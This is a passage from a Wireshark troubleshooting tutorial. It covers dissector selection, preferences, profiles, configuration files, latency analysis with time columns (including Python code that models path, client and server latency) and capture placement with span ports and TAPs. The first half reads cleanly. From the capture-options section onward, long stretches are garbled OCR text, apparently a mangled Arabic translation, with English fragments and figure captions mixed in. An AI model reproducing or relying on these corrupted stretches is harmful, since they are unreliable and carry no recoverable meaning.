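HTTP_FRAME = build_frame("24.6.173.220", "198.66.239.146", IPPROTO_TCP, tcp(35145, 80, HTTP_REQ))
ODD_PORT_FRAME = build_frame("24.6.173.220", "198.66.239.146", IPPROTO_TCP, tcp(35146, 48600, HTTP_REQ))
```

Run dissect_frame(ODD_PORT_FRAME, heuristics=False) and the chain ends in "data", exactly the TCP-only rows of the port 137 figure; with the heuristic enabled the request line is recognised, and after decode_as("tcp", 48600, "http") the port table is bypassed and the frame dissects as HTTP even with heuristics off. Real Wireshark has many more dissectors and tries both ports and heuristics in a configurable order, but the decision points are the same three fields: Ethernet Type, IP Protocol and the transport port.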



Preferences

Wireshark's preferences are reached through Edit | Preferences (or the Preferences button on the toolbar). The left-hand tree groups them into User Interface (with Layout, Columns, Font and Colors), Capture, Filter Expressions, Name Resolution, Printing, Protocols and Statistics. Preferences are stored per profile, so changes you make here apply to the profile shown in the Status Bar.

[Figure: Wireshark: Preferences - Profile: Default, with User Interface selected in the tree.]

Edit | Preferences | User Interface

The User Interface page holds general behaviour settings: whether window positions, window sizes and maximized state are saved between sessions; when to open a console window; the "File Open" dialog behaviour (remember last directory, or always start in a given directory) and the "File Open" preview timeout; the maximum number of recent filters and recent files kept; whether to confirm unsaved capture files; whether to wrap to the end or beginning of the file during a find; whether settings dialogs show a save button; whether the welcome screen and title bar show the version; and the auto-scroll behaviour on expansion of a tree.

Edit | Preferences | Name Resolution

Wireshark can resolve three kinds of names: MAC addresses, transport-layer port numbers and IP addresses.

MAC name resolution: Wireshark replaces the first three bytes of a MAC address (the organisationally unique identifier) with the manufacturer name from its manufacturer database, which is why the Ethernet headers above show names such as Cadant_31:bb:c1 and Hewlett-_a7:bf:a3. This uses a local table only and sends no traffic.

Transport name resolution: port numbers are replaced with the service names from Wireshark's services file, such as "http" for port 80 or "domain" for port 53. The name reflects only the port number, not the traffic: "ftp" in the Info column means port 21 is in use, not that the dissector found FTP.

Host name resolution: IP addresses are replaced with host names, so that www.wireshark.org appears instead of its IP address. This is off by default because resolving every address requires Wireshark to send DNS Pointer (PTR) queries, which adds traffic to the network, slows the loading of a trace, and can put your own DNS queries into a capture that is still running. When the names are needed, it is usually better to use a hosts file for the addresses of interest.

Name resolution can also be toggled from the View | Name Resolution menu, without opening the Preferences dialog.
Edit | Preferences | Filter Expressions

Filter Expressions are display filters saved as buttons on the display filter toolbar, so that a filter you use repeatedly (for a particular trace file, a protocol or a kind of problem) can be applied with one click. They are part of the profile and are therefore a natural thing to build into a task-specific profile.

Edit | Preferences | (+) Protocols

The Protocols section holds the preferences of each dissector. Three TCP preferences are worth knowing about:

Allow subdissector to reassemble TCP streams: when enabled, Wireshark collects the segments of an application-layer message and hands the complete message to the application dissector. For HTTP this means that a 200 OK response that spans several segments is shown, fully dissected, in the packet that carries the last segment, while the preceding segments are labelled "[TCP segment of a reassembled PDU]" (PDU: protocol data unit). When disabled, each segment is dissected on its own: the status line appears in the packet carrying the first segment and the later segments are shown as continuation data.

TCP reassembly enabled: the 200 OK response is shown in the packet carrying the last segment of the response.

TCP reassembly disabled: the 200 OK response is shown in the packet carrying the first segment of the response.

Track number of bytes in flight: "bytes in flight" are the bytes a sender has transmitted but for which it has not yet received an acknowledgement. When this preference is enabled, Wireshark adds a [Bytes in flight] value to the [SEQ/ACK analysis] section of each data-carrying TCP header. Watching this value against the advertised receive window shows how far the sender is running ahead of the receiver and whether the window, rather than the network, is limiting throughput. Calculating it costs some time when large traces are loaded.

Track number of bytes in flight enabled:

    [SEQ/ACK analysis]
        [Bytes in flight: 2920]

Calculate conversation timestamps: when enabled, Wireshark keeps track of time within each TCP conversation and adds a [Timestamps] section to every TCP header with the time since the first frame of the stream and the time since the previous frame of the stream. These values isolate the delays inside a single connection from the other traffic in the trace, and either of them can be turned into a column (see the TCP Delta column below).

    [Timestamps]
        [Time since first frame in this TCP stream: 1.619890000 seconds]
        [Time since previous frame in this TCP stream: 0.001268000 seconds]
Profiles

Profiles let you keep separate sets of Wireshark settings (preferences, columns, coloring rules, display and capture filters, filter-expression buttons) for different tasks, and switch between them in one click. A "security profile", for example, could contain coloring rules for ICMP traffic, for connection attempts to ports that should not be in use, and for the other traffic patterns you investigate most often, so that they stand out in the Packet List pane as soon as a trace is opened.

To create a new profile: right-click the profile name in the right-hand column of the Status Bar and choose New (or choose Edit | Configuration Profiles and click New), then give the profile a name, for example Troubleshooting. Wireshark switches to the new profile immediately. From this point on, the capture settings, name resolution settings, columns, coloring rules, preferences and filters you change are stored in the Troubleshooting profile and leave the Default profile untouched.

[Figure: the Configuration Profiles dialog with its New, Edit, Delete and Change buttons, opened from the profile column of the Status Bar.]

The Status Bar always shows the profile in use. In the figure below the Troubleshooting profile is active.

[Figure: the right-hand end of the Status Bar showing Packets, Displayed, Marked, Load time and Profile: Troubleshooting.]

A profile is simply a directory of configuration files. That makes profiles easy to back up, to copy to another Wireshark installation or to share with colleagues: copy the profile directory into the personal configuration directory of the other system and the profile appears in the list. Deleting a profile removes its directory and every setting it contains, so export or copy it first if you may need it again.
Locate Key Wireshark Configuration Files

Wireshark stores its configuration in two kinds of directories: the global configuration directory, which holds the default settings installed with the program, and the personal configuration directories, which hold the settings and profiles of the current user. Knowing where they are lets you back up, copy or share a configuration, and tells you which file to edit when a setting has no dialog.

The locations depend on the operating system and on the user account, so find them on your own system through Help | About Wireshark | Folders.

[Figure: the Folders tab of Help | About Wireshark, listing the "File" dialogs directory, Temp, Personal configuration, Global configuration, System, Program, Personal Plugins, Global Plugins and the GeoIP path.]

Global Configuration Directory

The global configuration directory contains the defaults that apply when a user or profile has not overridden them. The files worth knowing are:

preferences -> contains the settings defined when you select Edit | Preferences
dfilters -> contains the display filters for a profile
cfilters -> contains the capture filters for a profile
colorfilters -> contains the coloring rules for a profile
recent -> contains miscellaneous settings (window geometry, recently used files and filters)

Personal Configuration Directory

The personal configuration directory contains the same set of files for your own Default profile, plus a profiles subdirectory with one subdirectory per additional profile. Each profile directory holds its own copies of the files listed above, and the settings in them override the global defaults while that profile is in use.
Configure Time Columns to Spot Latency Problems

Latency (delay) is the time it takes for a packet to cross the network, or for a host to answer. Some latency is always present; what matters is a latency larger than the application can tolerate, because every transaction that waits on it slows down. Wireshark's Time column, read together with the Info column, lets you locate where in a conversation the time is being spent and which of three kinds of latency you are looking at: path latency, client latency and server latency.

Path Latency

Path latency, usually measured as round trip time (RTT), is the delay introduced by the network between two hosts. The larger the RTT, the longer every request/response exchange takes, and the more an application that sends many small requests suffers. A file transfer over a path with a 10 ms RTT completes much faster than the same transfer over a path with a 100 ms RTT even when both links have the same bandwidth, because the sender repeatedly has to wait for acknowledgements. Path latency can be caused by the distance between the hosts, by congestion on the way, or by interconnecting devices (routers, firewalls, proxies) that are slow to forward traffic.

In Wireshark the simplest place to measure path latency is the start of the TCP three-way handshake: the time between the client's SYN and the server's SYN/ACK. Neither side runs application code at this point, so the gap is almost entirely network time. If the handshake is slow, no tuning of client or server will help; the problem is on the path.

[Figure: SYN sent by the client, SYN/ACK returned by the server; the interval between them is the path latency.]

Client Latency

Client latency is delay caused by the client itself. The pattern is a quick ACK and a slow request: the client receives data from the server, acknowledges it at once, and then waits a long time before sending its next request. Because the ACK arrived quickly, the path is not the cause; the client was busy processing, waiting for the user, or simply slow. This pattern is perfectly normal when a user is reading a page before clicking the next link, so judge client latency against what the application should be doing at that moment, not only against the size of the gap.

[Figure: server DATA, quick client ACK, then a slow client REQUEST: "quick ACK and slow request".]

Server Latency

Server latency is delay caused by the server. The pattern is the mirror image: the server receives a request, acknowledges it quickly, and then takes a long time to send the response. The quick ACK again rules out the path; the time went into the server's processing (a slow back-end query, an overloaded server, or a request that needed further lookups). This is the latency users most often report as "the application is slow", and the one most often blamed, wrongly, on the network.

[Figure: client REQUEST, quick server ACK, then a slow server RESPONSE: "quick ACK and slow response".]

Detecting Latency Problems

Method 1: Use the Time column. By default the Time column shows the time since the first packet of the capture, so the first packet reads 0.000000000. To see the time between consecutive packets instead, choose View | Time Display Format | Seconds since Previous Displayed Packet. Apply a display filter for one UDP or TCP conversation and the column shows the gap in front of each packet of that conversation; sort the Time column in descending order and the largest delays come to the top, where the Info column tells you what kind of packet followed each gap.

Method 2: Add a TCP Delta column. Enable the TCP preference Calculate conversation timestamps (Edit | Preferences | Protocols | TCP). Expand the [Timestamps] section of any TCP header, right-click Time since previous frame in this TCP stream and choose Apply as Column. This column measures the gap within each TCP stream regardless of how many other conversations are interleaved in the trace, so it needs no display filter and can be sorted in the same way.
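As an added example (my own code, not from the original text and not Wireshark's), the following Python computes the three latencies and the two time deltas described above from a constructed TCP conversation. It models the Time column set to Seconds since Previous Displayed Packet (the gap between packets that pass a display filter), the TCP [Time since previous frame in this TCP stream] value, and the three patterns: path latency (SYN to SYN/ACK), client latency (a quick client ACK followed by a slow REQUEST) and server latency (a quick server ACK followed by a slow RESPONSE). The Pkt record, the "kind" labels and the sample timings are simplifications assumed for the example; a real capture would come from a pcap and the REQUEST/RESPONSE roles from the application dissector.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    no: int          # frame number, as in the No. column
    t: float         # seconds since the start of the capture, as in the default Time column
    src: str
    sport: int
    dst: str
    dport: int
    flags: str       # "SYN", "SYN/ACK", "ACK" (a pure ACK has kind "")
    kind: str = ""   # "REQUEST" / "RESPONSE" for packets carrying application data


def stream_key(p):
    """Both directions of a connection share one key (the idea behind tcp.stream)."""
    return tuple(sorted([(p.src, p.sport), (p.dst, p.dport)]))


def displayed_deltas(pkts, display_filter=lambda p: True):
    """View | Time Display Format | Seconds since Previous Displayed Packet."""
    out, prev = {}, None
    for p in pkts:
        if display_filter(p):
            out[p.no] = round(p.t - prev.t, 6) if prev else 0.0
            prev = p
    return out


def tcp_stream_deltas(pkts):
    """[Time since previous frame in this TCP stream], regardless of interleaved traffic."""
    out, last = {}, {}
    for p in pkts:
        k = stream_key(p)
        out[p.no] = round(p.t - last[k].t, 6) if k in last else 0.0
        last[k] = p
    return out


def latencies(pkts):
    """Path, client and server latency per stream, following the three patterns above."""
    streams = defaultdict(list)
    for p in pkts:
        streams[stream_key(p)].append(p)
    result = {}
    for k, ps in streams.items():
        syn = next((p for p in ps if p.flags == "SYN"), None)
        if syn is None:
            continue                        # handshake not captured: path latency unknown
        client = (syn.src, syn.sport)       # the SYN sender is the client
        res = {"path": None, "client": [], "server": []}
        prev_from = {}                      # last packet seen from each side of the stream
        for p in ps:
            side = "client" if (p.src, p.sport) == client else "server"
            if p.flags == "SYN/ACK" and res["path"] is None:
                res["path"] = round(p.t - syn.t, 6)          # SYN -> SYN/ACK: network time
            prev = prev_from.get(side)
            # Quick pure ACK, then a slow REQUEST (client) or RESPONSE (server): the gap
            # was spent inside that host, not on the path.
            if p.kind in ("REQUEST", "RESPONSE") and prev and prev.flags == "ACK" and prev.kind == "":
                res[side].append((p.no, round(p.t - prev.t, 6)))
            prev_from[side] = p
        result[k] = res
    return result


# Constructed conversation (not a real capture): client 24.6.173.220 to a web server on port 80.
C, S = ("24.6.173.220", 35145), ("74.125.224.80", 80)
SAMPLE = [
    Pkt(1, 0.000, *C, *S, "SYN"),
    Pkt(2, 0.045, *S, *C, "SYN/ACK"),            # path latency: 0.045 s
    Pkt(3, 0.046, *C, *S, "ACK"),
    Pkt(4, 0.047, *C, *S, "ACK", "REQUEST"),     # first request right after the handshake
    Pkt(5, 0.048, *S, *C, "ACK"),                # server ACKs at once...
    Pkt(6, 0.850, *S, *C, "ACK", "RESPONSE"),    # ...but answers 0.802 s later: server latency
    Pkt(7, 0.851, *C, *S, "ACK"),                # client ACKs at once...
    Pkt(8, 3.000, *C, *S, "ACK", "REQUEST"),     # ...next request 2.149 s later: client latency
    Pkt(9, 3.001, *S, *C, "ACK"),
    Pkt(10, 3.050, *S, *C, "ACK", "RESPONSE"),   # server latency: 0.049 s
]
```

With the display filter set to data-carrying packets only, displayed_deltas reports 0.803 s before frame 6, 2.15 s before frame 8 and 0.05 s before frame 10, which is what the Time column shows after Seconds since Previous Displayed Packet; latencies then attributes the 0.802 s and 0.049 s gaps to the server and the 2.149 s gap to the client, because in each case the preceding packet from that host was a prompt pure ACK. A real trace has many streams interleaved, which is exactly why the per-stream delta is more useful than the per-displayed-packet one.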





[Figure: the [Timestamps] section of a TCP header expanded in the Packet Details pane, with the field menu open on [Time since previous frame in this TCP stream] and Apply as Column selected; the resulting column shows 0.226385, 0.000176, 0.001193, 0.193286 and 0.001019 seconds for frames 6 to 10 of a conversation between 150.101.135.12 and 24.6.173.220.]





A large gap in front of a packet is not automatically a problem. Delays before the following packets are usually normal behaviour (a user pausing, a timer expiring, or a connection being closed after a period of inactivity) rather than latency to investigate:

.ico file requests (browsers fetch the site icon after the page itself has loaded)
SYN packets (a new connection started some time after the previous activity)
FIN, FIN/ACK, RST, or RST/ACK (connections being closed after an idle period)
GET requests (the user deciding when to click the next link)
DNS queries (a lookup triggered by the user's next action)
TLSv1 encrypted alerts (typically the close notification sent when a session is torn down)
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Determine the Best Capture Method and Apply Capture Filters 

Capture Options 

Capture I Options 



Capture 
Ca^lurt 



Interface Link- layer 

WrFc*<» USB wireterc captor* *S„. &JZ-1 L plus 



Nm. Mode SftipJcn DM Eufler ;MB) Capture: Filter 

header enable** default 1 




Capture on al* ir.l*rtac cs 

.'<] Capture aft «n puwrirtcuciui mode 
C jpturt Filf-;-; 



ffl Use in»***;fH« 
ffl Hcxtlilcvwy 

J Rmg buffer ivrfh 

S3op Captur* ... j^fr 
_ after 



V U-:r pcap-ngj format 


100 V 




1 |j 




5 | 


fil= t 


J. 



Q -aftef 



jr- jminute[sj 



3 



iljriMelisUrf partettmraaltime 
SI iirtomadc scrolling in !>■-£ capture 

V. Hrdt: -capture irtf-fr dialog 
Name-FLc-^olutic-n 
V Enahk MAC nprvn rcseSirtion 

Enable ivcty^ort name eesoSuljtoo 
v Enable iiaawporlnaniiefesolution 



I Capturing (n>m R**Jl*fc Ptle F£ Fsrrriy Control \Do^*\NPF_(6-f 79FEC&-FF79 -4970-«£4-eE Ff 30OA9B9F j 



file £drt Jfiew Qo Capture £na4yze Statistics Telephony Teds Externals Help 

iiiftt t-: je s a 



jlii^l c> L5^'j i> jj^^ ^ -^^^ cr^^ ^f^i s ^ :(i) Interface List 

.(multi-adapter capture) ^f^t Sj^l c> jl 
^L^j jl <Jljj J Uj^> IjSj j^j) AiikJl (Capture Filters) J^isavi j£« o^j*i :(2) Capture Filter - 

B S^*JI jl aJ^JI ^1 a£j^3I cjI^I j ajIc ji^U ;(3) Manage Interfaces 

U3I JalSilVI j] Uajj^ ^jja jj 6 ring buffer £^ jj djUL iai^ ^i^^j aI^Ll ;(4) Capture File(s) 

.JalSsIVI £c> ^>JI j auto-scroll c> *^Sa3 :(5) Display Options - 

j\ A^ubtftW cjULiJI <;L<^ ,(*j^l cf-^* I iali^Vl ajIac c-ilij] JajJj ^jja jl - iklujj ;(6) Stop Capture 

j IP u^j^ j MAC u^j^ <^u3U pU^Vl <^ jj Jj*^ jl c> :(7) Name Resolution 

.jjj! jj^j fj j^Vl cjVUJI ^ Ul .JaliilVI <^ 1^3 :(8) Green Wireshark Icon - 

Capture Traffic

Where you capture determines what you can see. Round trip latency times, retransmissions and the other symptoms of a performance problem look different at each point of the path, so when a user complains about slow performance, capture as close as possible to that user's host: the trace then shows exactly what that host sent and received and the delays it actually experienced.

Start capturing as close as possible to the complaining/suspect host.

Capturing at the other end of the conversation, near the server, shows only the server's view of the same exchange and hides what happened on the client's side of the path. If the two views disagree, the problem lies between them: move the capture point step by step through the interconnecting devices (switches, routers, firewalls) until the trace shows where the delay or the loss first appears.
Capture Traffic on Your Ethernet Network

On a switched Ethernet network a host normally receives only the traffic addressed to it (plus broadcasts and multicasts), so you have to decide how to get the traffic you want in front of Wireshark. Knowing the options in advance saves time when a problem arrives. There are three:

Option 1: Capture directly on the complaining host

This is the simplest option if you are allowed to install Wireshark on the host, or to run it without installation using Portable Wireshark from a USB drive. If you cannot install Wireshark on the host, for example on a Unix/Linux server, capture with tcpdump instead and open the resulting trace file in Wireshark.

Option 2: Span the host's switch port

If the switch supports port spanning (port mirroring), configure it to copy the traffic of the host's port to the port your analyzer is connected to. Because the switch forwards the copied frames as normal frames, data link-layer errors (bad CRCs, runts) are not forwarded, so a span port will never show physical-layer problems; and if the spanned traffic exceeds the speed of the analyzer's port, frames are dropped without any indication in the trace.

Option 3: Use a Test Access Port (TAP)

A TAP is a hardware device inserted in line between two devices (a host and its switch, or a switch and a firewall) that copies the full-duplex traffic in both directions to one or more monitor ports, including the data link-layer errors that a span port discards. A passive TAP keeps the link running even if the monitoring device is disconnected or loses power, so it can be left permanently in place. The costs are the device itself and the need for physical access to the link, since inserting a TAP interrupts the link for the moment it takes to reconnect the cables; a TAP placed in front of a gateway, for example, sees everything that enters or leaves the network but must be installed during a maintenance window.



TAPs exist for half-duplex and full-duplex links. A passive TAP creates a permanent access port for monitoring full-duplex traffic: the network signal is either split (optical TAPs) or regenerated (copper TAPs) so that the monitoring device receives exactly the signal the in-line devices see, including physical-layer and data link-layer errors such as CRC errors that a switch's span port would drop.

[Figure: a Net Optics TAP with Network ports, Monitor ports and a Port Aggregator, shown before and after insertion between a Switch and a Firewall; the passive TAP creates a permanent access port to monitor full-duplex traffic, and the monitoring device sees the same traffic as the in-line devices, including physical-layer errors. A second diagram shows two TAPs in series, HOST - TAP A - TAP B - HOST, feeding a Collector.]
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Non-Aggregating Taps • 




tiljLJj jj! jll J-*^ ls'^ jW^' .Al^aiixJI iflliftll ^ o£ [Full-Duplex] ^L^jVI ^ >J1 djVU^ajVI jjj-^ 
ialijlV ciljUi jjI jll jl^cl ^Iloj j . [Monitor Port]^-^j-^ ^-^jj^ l>* jjj^ <£f^l CjtaLkj jjjjI < ; iILjj 

.{Monitor Port] ^ jj^l Cy* o0 J) U-^ 3 o^J ^ jfi J ^j& ] <L^aal^ l Sj^VI jjjjI ^l^klaal ^jl^ j^Vl l_uUJI 

.mergecap j*Vl ji File I Merge fl^U (Jjj^ j& f*?^ ^ o^l* ^ ^ ^? ^ 
[Monitor Port] ^ ^ jjj i> u^' c> jjj-^' ^£ J) ^f^> csj-^ ^ j ^ :4JajalA 

£jUaJt J -k^Xa j^b L_fl jjuoS USb ^ djUilkJl I^A ±J\ jl£ lilj 2<^t ^UaJ JjJ ^^jll £jlkll L^^llkVI I ji^ (j^ 




^ J-jc- [monitor ports] £ j*^' u' i> ^ o^j <iA^I ^ c^*^ ^ jjj*^' o£ 

,^LaJl ^ jill (JJ>^C Jc 6^.1 j <£jjui <aUaJj ^.1 j tiljLai jjI j J] ^"ll^J L_fl jjuj TAP ^ ^ .4£jjoJI CjlaUaJ (j-G 

Regenerating Taps • 




JNfet O-J? iritis JO <_j, j^cn &irf J^e^e-pj^ rdTf a"L3« Ttip f " >f tj ^ f ejp f - e ^r.s . 4." u ■r?^ J f 
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J tT<< Iajj 4<JH<Jl J-IJjuo Jc „ JJJ-all ^J^> J] ^ <Ujai^U/Clb gaUl] 6^.1 j ^-aj ftl^l j5£l t^L^l UJ^ ^-^C- ~ iklLujJ 

Suricata jl (www.snort.org) Snort JS* us j^> sbl ^ JLull *l jajj t*S jUi jjIj jj^ll 
jll a j^l jl) jjjjI JL^j^U ^xuoij j (> jSSI £ jaJI Iftia I^jJ (www.openinfosecfoundation.org) 




[Figure: a regenerating tap feeding both Wireshark and Snort]



Link Aggregation Taps • 

J]j JJ^>^ ^Jfll j* J 4-^ Cl u£ lil 4<JHall cJ^f^ Jc- . JJJ*^ ^^P" ^Jfllj-al j -^lj j-* J^l UJ-^ ^-^c- ^^uin 

.^1 y&l ^1 j link aggregation tap ^v^n" jl TAP ^l^l^l c> ^ .<L^aiiall ^\ j-* q±&\ 

Intelligent Taps • 

<il3i jii£l j ^» j^JI ^^O^ £^ j jj^>^ ^^>^ lA-*^ t — ^j^j^ il^j) J s-l^ilL 

djUj tdjU jlatJI ^ j«J TAPS J ^llc ^j^ Net Optics . J jl^JI J^ &ja jlall CjI JjaII 

www.netoptics.com
Analyzer Agents • 

t> t> ^ switches J^ <L^j ^Ujj j& 6J Lc j distributed analyzers <L^I jj 

. JjJ-all 4^J^> Sjl^) (j-a c*1j£ aJ /DjbVl Jl CjUUJI (JLujjIj djljjjJl/iaLL<Jl 

Spanning VLANs • 

<4tt ^ ^VLAN J * c> jt cjliaiill SPAN lU^ <>. Cil&tiJI Jl ^Ui^U SPAN J TAP t> l£ 
jjI jll ^l^cj t VLAN l£ u' J?-' c> J^ 1 j^'j^ ^ (destination port) ^ jjj 

.VLAN ^JJ J^ UJ^ ^ (jLdjJa V (j^J J VLAN ^^acl jAjJa jjJax£ ^pJJjjaJl Jl jA\ tiljLai 



Analyze Routed Networks • 

^.Ij t . ul ^ Jc. tiljLui jjI jll ^jJa cIlqS lijj.IP a£^juJI (JjjUc Jl bUlojl a£jjoJI djlia^j Jj^a Jc jjjI^JI ^^-^■^ 

.4£jJa3l tiliS ^ ^L»^lall jl Jl <fr^lall dlia^ill laaa ^IJjj jjuj tiljli jjjI jll j^l c>» 
^Ijillj J^ll Sj^i ^ISlsslI .(Subnetted 255.255.0.0j *10.3.0.0j 10.2.0.0j 10.1.0.0) c> uj^ J^ J^l 
.10.2.0.0 <^ J^j-W [wireshark #2] ^ j^ ^j^ uj^ o 3 j 10.1.0.0 J^ uj^ ^ 



[Figure: routed network. Networks 10.1.0.0, 10.2.0.0 and 10.3.0.0 are joined by Router A; Switch C on network 10.2.0.0 connects Client A, Client B, Client C and Server B. Wireshark #1 listens on a SPAN port of Router A; Wireshark #2 sits on a tap between Server B and Switch C]
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[router A] a uj& u'^ ^ JJ SPAN i> *^j ^ [Wireshark #1] 

. 10.2.0.0 4^ j C j B j A j>U^ J* j t> J\ £^VI c> [Wireshark #1] ^Jj^ j^l jll l£*j 

^ill j Switch C j server B o£ J^l jll JaaJI J ls^I j aggregation TAP c> ^l^j ^ [Wireshark #2] 
.Server B and the local and remote networks JLs i> *^ll cASiti <jjj <> jjIjII ^jSai 

(Capture Traffic on Your Wireless Network) 4Ai«£UI jjj^II <Sj* JaUftll J_ 

jjixl! J cilj^Lai^ Jc Ljajl Jaxjj (<Lj£lui!>Ut alt CjI£^uJ1) 4j£Li!>UI CjKjhiII <J*c Jc^ cil^Laaj jl jjI jll 

J j^« ^J^J i J jVl .WLAN J^ JalSSlV ^(j^l (> jjc .lW ^f^> ji ^ jlft J ^bVl < axjJa tjim Jc 

B t*SjL5 jjI jll J^j *UjI *l J J J 31 4> J^ 1 WLAN 

?WLAN *l jj <^sJ ci^t u - 
J ^ ja. tiL (j-^alaJl AjaXoa^Ul a£jJo3I <jl£ lij ^j^aal Interface ^ j ^-^j^ <LajUlt ^ Capture 
*^ <O^H <Lajta J o^j J^ftlVI ^jUtj ^jjILj db<»a lij .V ^1 tiljUi jjI jJI J!)tk 4£jJoll jjj-* 4-^j^ ^jj a ^ ci^j Interface 
J j .tSljLS jj! jll V ciL (j-aUJI AjiLa^U) a£jj^3I Cjj\£ jl ^^jju jj>* ^j^- <^ c*ta£tj ^c. jll Jc^ ^ j»JI ^1 

AjaLjaVl dlLa jlx-all (J^asu t flJjJaJ V jfl <j£l j JJJ-^i ^J^- C5J^J ^J^j J^i ^ (j-alaJl 4j^\ui^Ul <£jjuJl Clljl£ ^O^J jUa.Vl (J^H 

J ^Ult j>» jl ^^j^j WLAN ^ 2j<^nu Ky'iM cjV j£ jjjjj Jj J^j ^U3I ^ k£U^\l\ *<y*\\ JjU-; ^ 
-t *Uij 4u^»UJ| djliUajj (RF (Radio Frequency))^l^^l j^ *^ j^VI *^ lSJ^ WLAN ^ 
. J£UUI ^j^j] spectrum analyzer f^-^ ^UJI ^U^j^^ j^RF unmodulated SjS ^^j* jSaj V ^jUi jjIjII 

^ .^W^ j spectrum analyzer ^ij^ j>» <S jUjujU ojli^ ^UjU MetaGeek ^ >^ ^ 

■ www.metageek.net ^jUj ^jj ^cjUjkJI 



[Figure: Wireshark placed next to Client C. Caption: place Wireshark close to the client to analyze traffic from the client's perspective]

m k£LA\ A£fxi3l J <*i ^ Jj 4^jUl<i 4_^Loj^UI ^<;^ Jc; ^IjLSj jjIjII 

4i£-dJ ^^jll CjUj^sijII ^jiasuj WLAN ^UaJ 4j^3 jj^J <J» ^IjUjj jjI jll cJ-^^ jj;^^ jW^ 1 UJ^ L . WLAN a< \ u * (JjI^j] 

.monitor modej promiscuous mode u^-^j^^ <^ lUI*^I c> 
dilia^iH JalSslI ^ -La^t jjj WLAN AiUaj ^j^j promiscuous mode u^^^ u^*-^ ^ 

<!!>Lk ^ja jl j-d ^<»J ( j3l j^Jl 6^-ljij <£jjuoll dijl^l ^-«ft.t.»J j^l ^"it a) Ja^a J^xJl jl^aJI (J^J ^f^^ ^3^^*^^ 

jj^j jll ^j^Jl laaa JaSjL 802.1 1 J Monitor mode uj^ j^^ ^ ^^kiujl lijj . ...V J a! <^ dul£ *l jjuj 

^1 jjoj A£jjoJI AiUaJ <iajoj| jj 1 ^L^aaJ jll JJ^>^^ ^^>^ JalSjll ci^-l (j^ J .^J^ A ^" Ui \^ J SSID <J ^ > jTi A£jjoJI Jc I^jojI 

jli ^ jll liA J t [rfmon modepW ^^£5 jll " Monitor mode" ^ ^ J <^3I <aUaj ^ j t^uLL* jl jAlii 

.^jjaajjjuoll CjIc a j-<i <c j<^^ a ^\ J I j> >ir. <J j^-<JI l5*^j *^ [driver] <J j^ ^11 
.(^Jl i J jj^JVI ^j^JI ^ jSjV! ^L^) cjVUajVI ilui V iluill cj ji£ (Jl [monitor mode] ^l^l^l ^ j^Ia 
J jl djlui jj! jll J^u V j^i tit WinPcap ^-^t jj ^ jj V ^ 1^ j .fjaJ! ^^11 ^ ^>J) JUSIujI ^jjj 4iil j 

.djLi 
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Use an AirPcap Adapter for Full WLAN Visibility • 
AirPcap c> ^ t"\ * *>* j ^ jl^li) CACE <( j>ii>jil 4% ^ Lu^ Vj) ^ li$J I jtj 

.^.Ij dij ^ (*^Axi<i CjI jja ^UlUj) AirPcap 




[Figure: The AirPcap adapter was designed for WLAN capture]

lij) WLAN ^ < WLANjjj*^ JaliiilV \ - ^ ^ AirPcap * - ^2 

3 LilLH djIjlLVI J ^ <ji^a jll cjUUJ! AiUblj ^(^^ 
1$U >W ^ cjV j^JI <t*Ui AiUbVU .CjUUJI cjIjILIj rfjblj ^ jVij..ilt 802.1 1 JaUBSt AirPcap j^J 
uj^ ^ JalSslI t> Jj^JI jSaj yr^j 6 Rfmon^j ji ajSL^UI cjbj Uiajl JAl? Monitor mode 
ia^a ^jjjJ j ^802.11 jjj^ AirPcap J Cy ls^*-£ ^ j J j ^Jaij ^ 



jlLI J£ JI RadioTap 



(Per-Packet Information) PPI H s^j^ AirPcap ^->Vj^ ^) 



^ jiabd j ftjL^yi s jS j t jUaVI aja cJj^ (Frequency) ^j3ll J 0 l£ j-^i jjj^ 6 ^ .WLAN 

Lp 3 ^*^ ■ AirPcapJ 3-lajuit 4 laliLlIl ^aJ £JJJ ( <lU cs^"^ (J^-^ JJ^^ .t^lSi (>a J tJalijlVI (jl^ j JalijlVI 3 J jjJall 

. RadioTapu^b J ^j' j^^ cjU jix-<JI J^a^ ^ ^ j^JI 

CjV J ^—j^ jix-^Jl .l&^VI j^JI AirPcap j^^^ ^ j<^^mu cjI^jJJI ^j^. JalislV Cu£ lij 

http://www.riverbed.com ftj^j j 'AirPcap 



[Figure: Wireshark capturing through an AirPcap adapter. Captions: "The AirPcap adapter can see 802.11 control, management and data frames" (the packet list shows 802.11 Probe Request and Probe Response frames between Apple_47:33:97 and Cisco-Li_d0:94:c2); "The AirPcap adapter can add a Radiotap or PPI header which includes metadata about 802.11 frames". The expanded Radiotap Header v0 (length 28) shows the MAC timestamp, flags 0x10, data rate 1.0 Mb/s, channel frequency 2437 MHz [BG 6], channel type 802.11b, SSI signal -59 dBm, SSI noise -97 dBm, signal quality 94 and antenna 0]



(Identify Active Interfaces) 4J^iU) <£^iJ) cjI^aIj jj^aj 4b 

.^^U (Jl^xi (jj^J jlin^ ^-^-^ J .I^^JjojJ L_fl jjoj 

cjIjjVi -Sajj^ ^ Interface j j ti> j> Interface ^ c>j ^^J^ i> Capture c3> ^ 
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l£ c> IPv6 t*U ^ jj! jll jti 4 (IPv6 j IPv4) (dual-stack host) ^ii^ lil 

^ jij j^j lt^^ J 4 Jtl<J! cJ^f*^ c^c- j uj 6 <J ^ IPv4 j^- <a^>*-<J IPv6 cs-^* .C5-^J-^ cJ^-^ J >^ 
j! jVI o^^xj ^jUjjI jlla lil . Atheros L1C PCI-E Ethernet Controller J jp^ o± IPv6 o\y& jftlb 

JalijJVt 4_iLo 4_ilo l_a jjoj ^1 .J j^aII li^J IPv4 



[Figure: Wireshark: Capture Interfaces dialog. Columns: Description, IP, Packets, Packets/s. Rows: Atheros L1C PCI-E Ethernet Controller (IPv4 address shown) and three Microsoft adapters showing only fe80:: link-local IPv6 addresses. Buttons: Details, Start, Stop, Options, Close]

<JL^j] ^jj .Ajia &1I ^ * a I jl! J cjL* jIslxJI j>* ^ j^j^ ^ all 4Ajaii3l J jSjiL V Details 




Capture Traffic Remotely • 

^o ^ijJI Ai ixi^ixJI a£ jJJI ^Ijj 2^.1 j RSPAN. U^j cr^^j [remote SPAN] ^ switches 

j. Ultra VNC (free) ^ [target client] j^j ^ j^j^ ^Ja^l jj jo Jalisl^U iajjaij ^Ij jlrk 

axj jo ^j3I ^al jj j^ cj^Ij jo o jUo anyplace jLogmein 
